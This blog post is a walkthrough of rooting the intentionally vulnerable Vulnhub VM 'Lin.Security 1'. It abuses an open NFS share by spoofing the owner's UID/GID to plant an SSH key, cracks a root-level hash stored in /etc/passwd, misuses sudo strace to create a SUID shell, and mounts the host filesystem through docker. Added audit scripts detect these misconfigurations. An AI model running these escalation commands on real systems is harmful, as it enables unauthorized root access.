2018-07-15

Vulnhub Linux VM "Lin.Security 1" Walkthrough

Hello All,

This blog post is a walkthrough of the vulnerable Linux VM "Lin.Security 1".
Download link: https://www.vulnhub.com/entry/linsecurity-1,244/

After configuring the VM, I started with port scanning using the Nmap scanner.
The result was as follows:


Port 2049 is open; it is used by the NFS share service.

To check the available shares on the machine, I ran the command below, which lists the NFS shares:

showmount -e Machine_IP

The share "/home/peter" is available to any IP.
Let's mount it on the attacker machine using the command below:

mount -t nfs Machine_ip:share_name local_machine_directory -o nolock

I mounted the NFS share on a directory named "b0x".


The ls -al command shows the content of the home directory of the user peter ("/home/peter").

Next, I checked the permissions of the mounted share using the command below:

stat b0x


After searching on the internet, I came to know about an NFS share vulnerability according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server".
Currently, the NFS share has UID 1001 and GID 1005.

So we need to have an OS user named "ftp" with UID "1001" and GID "1005".


After changing the UID and GID of the OS user "ftp", switch to it and try to create a file, so that we can confirm that we have the privilege to create a file or directory on the mounted share.

Now, I created a .ssh directory and copied the "id_rsa.pub" key of the user "ftp" to the mounted share, into the ".ssh" directory with the name "authorized_keys", so that I can SSH to the machine from my machine using the SSH key.


After pushing the SSH key file, we can log in to the machine using the command below:

ssh peter@machine_IP
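
Added example, not part of the original post: seen from the server side, the export used above is a configuration finding. The shell function below audits exports(5) text for exports open to any host and for read-write exports that honour client-supplied UID/GID values; the sample file is constructed, and the option list shown for /home/peter is an assumption.

```shell
#!/bin/sh
# Added example: flag exports(5) entries that let any client choose its own UID/GID.
# Assumes the default sec=sys (AUTH_SYS) flavour unless a sec=krb5* option is listed.

audit_exports() {
    # Reads exports(5) text from the file named in $1, or from stdin.
    awk '
        { sub(/#.*/, "") }                       # strip comments
        NF == 0 { next }
        NF == 1 { print "WORLD " $1; next }      # path with no client list
        {
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                p = index($i, "(")
                if (p > 0) {
                    client = substr($i, 1, p - 1)
                    opts = substr($i, p + 1)
                    sub(/\)$/, "", opts)
                }
                o = "," opts ","
                if (client == "" || client == "*")
                    print "WORLD " $1
                if (o ~ /,no_root_squash,/)
                    print "NO_ROOT_SQUASH " $1 " " client
                # rw without all_squash: the server honours the IDs the client sends
                if (o ~ /,rw,/ && o !~ /,all_squash,/ && o !~ /,sec=krb5/)
                    print "CLIENT_IDS_TRUSTED " $1 " " client
            }
        }
    ' "${1:--}"
}

# Constructed sample; the options on /home/peter are an assumption, not the VM file.
sample_exports() {
    cat <<'EOF'
# constructed /etc/exports
/home/peter *(rw,sync,no_subtree_check)
/srv/build 192.0.2.10(rw,sync,all_squash,anonuid=1500,anongid=1500)
/srv/docs 192.0.2.0/24(ro,sync)
EOF
}

sample_exports | audit_exports
```

Restricting the client list and mapping every request to one unprivileged account with all_squash, anonuid and anongid clears both findings for the first line.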


Now we are inside the machine. I read the "/etc/passwd" file and found an entry for an OS user "insecurity" with UID 0 and a unix hash in the "Shadow masking" field.


I searched about it and found that, on old systems, the "/etc/passwd" file used to hold the password hash of the OS user. So I cracked the hash using Hashcat and got the plain-text password for the hash.


Now, I logged in as user "insecurity" using the recovered password and got root user privilege on the machine; that is one method.
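
Added example, not part of the original post: both conditions used in this method (a second UID 0 account, and a hash stored in the world-readable passwd file) can be detected with a short audit. The sample entries are constructed and the hash is a placeholder, so the scheme it reports says nothing about the hash on the VM.

```shell
#!/bin/sh
# Added example: audit a passwd(5)-format file for extra UID 0 accounts and for
# password hashes stored in the file itself instead of /etc/shadow.

audit_passwd() {
    # Reads passwd(5) text from the file named in $1, or from stdin.
    awk -F: '
        function scheme(h) {
            if (h ~ /^\$1\$/)      return "md5crypt"
            if (h ~ /^\$2[aby]\$/) return "bcrypt"
            if (h ~ /^\$5\$/)      return "sha256crypt"
            if (h ~ /^\$6\$/)      return "sha512crypt"
            if (h ~ /^\$y\$/)      return "yescrypt"
            # traditional DES crypt: 13 characters, no $ prefix
            if (length(h) == 13 && substr(h, 1, 1) != "$") return "descrypt"
            return "unknown"
        }
        /^[ \t]*$/ || /^#/ { next }
        # every UID 0 account is root, whatever its name
        $3 ~ /^0+$/ && $1 != "root" { print "UID0 " $1 }
        $2 == "" { print "EMPTY_PASSWORD " $1; next }
        # "x" defers to /etc/shadow; a leading "*" or "!" marks a locked account
        $2 != "x" && $2 !~ /^[*!]/ { print "HASH_IN_PASSWD " $1 " " scheme($2) }
    ' "${1:--}"
}

# Constructed sample: the hash is a placeholder, not the value from the VM.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
peter:x:1001:1005::/home/peter:/bin/bash
insecurity:$6$constructedsalt$constructedplaceholderhash:0:0::/:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
EOF
}

sample_passwd | audit_passwd
```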


As the machine designer mentioned, there are multiple ways to root this machine, so I checked other possibilities as well and figured out that user "peter" is able to run the "strace" binary with sudo privilege. I used the command below to check whether user "peter" has sudo privilege to execute any binary:

sudo -l


Now, to take advantage of executing "strace" with sudo, I planned to compile a C program which drops the user to a "/bin/sh" shell, and then use sudo strace to change its ownership to the root user and make it a SUID binary.

Code of the C program which I used:


I compiled the program using the command below:

gcc r.c -o r



After compiling the code, I ran the command below to change the ownership of the compiled file:

sudo /usr/bin/strace chown root:root r


Check whether the command executed successfully:


It worked, and now the binary has the owner "root".
To set the SUID bit on the file, I ran the command below using "strace" with sudo:

sudo /usr/bin/strace chmod u+s r


Let's check whether the binary has the SUID bit set by listing the permissions of the file.


Great, now the binary has the SUID bit set on it as well. Now we just need to execute the binary: since its owner is the "root" user and it has the SUID bit set, we will get a "/bin/sh" shell with the privilege of the "root" user.
Let's execute the binary and check whether we got "root" privilege by running the command below:

./r


And yes, it worked and now we are in a root "/bin/sh" shell :)
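
Added example, not part of the original post: the method works because strace starts whatever program is named on its command line, so a sudo rule for it is a rule for any command. The function below reads the output of sudo -l and flags rules for such launcher tools; the wrapper list is a partial one chosen for this example, and the sample output (host name, NOPASSWD tag, second rule) is constructed.

```shell
#!/bin/sh
# Added example: flag sudo rules that amount to running any command as the target user.

# Tools whose job is to start the program named on their command line
# (partial list chosen for this example).
EXEC_WRAPPERS="strace ltrace env nice nohup timeout setsid stdbuf xargs"

audit_sudo_list() {
    # Reads the output of sudo -l from the file named in $1, or from stdin.
    awk -v wrappers="$EXEC_WRAPPERS" '
        BEGIN { k = split(wrappers, w, " "); for (i = 1; i <= k; i++) risky[w[i]] = 1 }
        /^[ \t]+\(/ {                       # rule lines: "    (runas) [TAG:] cmd, cmd"
            line = $0
            sub(/^[ \t]+\([^)]*\)[ \t]*/, "", line)
            while (line ~ /^[A-Z_]+:/) sub(/^[A-Z_]+:[ \t]*/, "", line)
            n = split(line, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], part, " ")
                base = part[1]
                sub(/.*\//, "", base)       # keep the file name only
                if (part[1] == "ALL")   print "ANY_COMMAND ALL"
                else if (base in risky) print "EXEC_WRAPPER " part[1]
            }
        }
    ' "${1:--}"
}

# Constructed sample output; only the strace path comes from the post.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for peter on examplehost:
    env_reset, mail_badpass

User peter may run the following commands on examplehost:
    (ALL) NOPASSWD: /usr/bin/strace
    (root) /usr/bin/systemctl status ssh
EOF
}

sample_sudo_l | audit_sudo_list
```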

Using Docker
The machine is running Docker, and after searching a little bit I came to know that if we have access to an OS user account which is a member of the "docker" group, we can get a root shell by using the commands below:

docker run --privileged --interactive --tty --volume /:/host bash
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

The current user is a member of the "docker" group.
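
Added example, not part of the original post: since membership of the "docker" group is equivalent to root on the host, an audit should list every account that has it, whether as a supplementary or as a primary group. The function below does that from passwd- and group-format files; the sample files are constructed, and GID 998 and the "ci" account are assumptions.

```shell
#!/bin/sh
# Added example: list every account that can reach the Docker daemon through the
# docker group, as supplementary or primary group.

docker_group_users() {
    # $1 = passwd(5)-format file, $2 = group(5)-format file; prints sorted user names.
    awk -F: '
        FILENAME == ARGV[1] {                    # first pass: the group file
            if ($1 == "docker") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") hit[m[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { hit[$1] = 1 }   # docker as primary group
        END { for (u in hit) print u }
    ' "$2" "$1" | sort
}

# Constructed sample files; GID 998 and the "ci" account are assumptions.
write_samples() {
    printf '%s\n' 'root:x:0:0::/root:/bin/bash' \
                  'peter:x:1001:1005::/home/peter:/bin/bash' \
                  'ci:x:1500:998::/home/ci:/bin/sh' > "$1/passwd"
    printf '%s\n' 'peter:x:1005:' 'docker:x:998:peter' > "$1/group"
}

demo_dir=$(mktemp -d)
write_samples "$demo_dir"
docker_group_users "$demo_dir/passwd" "$demo_dir/group"
rm -rf "$demo_dir"
```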


Let's get a root shell using the two docker commands mentioned above xD

Using the first command


Using the second command



As the machine designer mentioned, there are multiple ways to get "root" privilege on the machine, so try to find other ways as well.

Thanks for reading.

--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)



© 2009 Start With Linux | Mannu Linux